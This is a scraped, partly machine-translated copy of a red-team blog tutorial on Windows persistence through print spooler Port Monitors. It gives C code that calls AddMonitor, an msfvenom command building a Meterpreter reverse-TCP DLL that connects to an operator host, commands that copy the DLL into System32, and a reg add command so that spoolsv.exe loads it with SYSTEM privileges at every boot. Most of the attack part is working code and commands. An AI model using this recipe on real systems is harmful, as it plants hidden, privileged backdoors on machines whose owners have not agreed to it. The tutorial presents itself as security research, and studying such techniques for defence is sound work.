Window maintain rights (ix): Port Monitor

Others 2019-11-11 14:46:20 views: null

Spooler Service is responsible for managing the Windows operating system print jobs. Interaction with the API and services performed by the print spooler, the API includes a function (AddMonitor), it can be used to install and connect the local configuration port monitor, and the monitor data file. This function can be injected DLL spoolsv.exe process, and by creating a registry key, red team operator can implement persistence on the system.
Brady Bloxham at the Defcon 22 illustrates this persistence technology. It should be noted that this technique requires administrator-level privileges, and the DLL must drop it on the disk. Mantvydas Baranauskas in his website using the following code, as part of his red team notes.
The WINDOWS.H header includes Winspool.h which is required by Microsoft specification head. The MONITOR_INFO_2 used to specify the necessary monitoring details are:

  • pName // Monitor Name
  • pEnvironment // environment architecture
  • pDLLName name // Monitor DLL file
#include "Windows.h"

int main() {
    MONITOR_INFO_2 monitorInfo;
    TCHAR env[12] = TEXT("Windows x64");
    TCHAR name[12] = TEXT("Monitor");
    TCHAR dll[12] = TEXT("test.dll");
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = env;
    monitorInfo.pDLLName = dll;
    AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
    return 0;
}


 AddMonitor function

 Generate a compiled executable code (in this case Monitors.exe), the executable file registration is performed malicious DLL (test.dll) on the system. Metasploit frame may serve for generating a payload Meterpreter DLL files.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.21 LPORT=4444 -f dll > test.dll

该DLL必须复制到System32文件夹上,因为根据Microsoft 文档,这是AddMonitor函数的预期位置,以便加载相关的DLL 。

copy C:\Users\pentestlab\Desktop\test.dll C:\Windows\System32
Monitors.exe


 将恶意DLL复制到System32

Monitors.exe必须与恶意DLL位于同一文件夹(System32)中。执行该文件将与Meterpreter建立通信。


 

 Meterpreter – AddMonitor注册DLL

但是,为了实现持久性,在“ Monitors ”注册表位置下需要一个密钥。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

以下命令将创建一个注册表项,该注册表项将包含值test.dll。从编辑器中查看注册表将验证密钥是否已创建。

reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ


 端口监视器–注册表项

下次重新启动时,spoolsv.exe进程将加载Monitors注册表项中存在并存储在Windows文件夹System32中的所有驱动程序DLL文件。下图演示了Meterpreter会话已建立与Print Spooler服务(SYSTEM)相同级别的特权,并且已从System32文件夹(已删除test.dll的文件夹)执行了执行。


 

 持久性端口监视器– Meterpreter

 

译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。

原文地址:https://pentestlab.blog/2019/10/28/persistence-port-monitors/

Guess you like

Origin www.cnblogs.com/xiaozi/p/11834481.html
Recommended
Ranking
Linux关机和重启详解(shutdown、halt、poweroff、reboot、init)
Netty work notes 0007---NIO's three core component relationships
Knife4j tutorial
2021.10.29,内容:什么时候用接口和抽象类
How to solve the problem that changing the memory frequency causes the computer to become unusable?
SpringMVC Tutorial - Controller
linux learning skills -Linux 25 transport Vega paid special privileges and facl extension
Financial quarterly report evaluation report data automatic generation 1.0
Agile Development Series - The Values of Agile Development
scrapy achieve browsercookie Middleware
Daily
More
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)

Code World

© 2018 codetd.com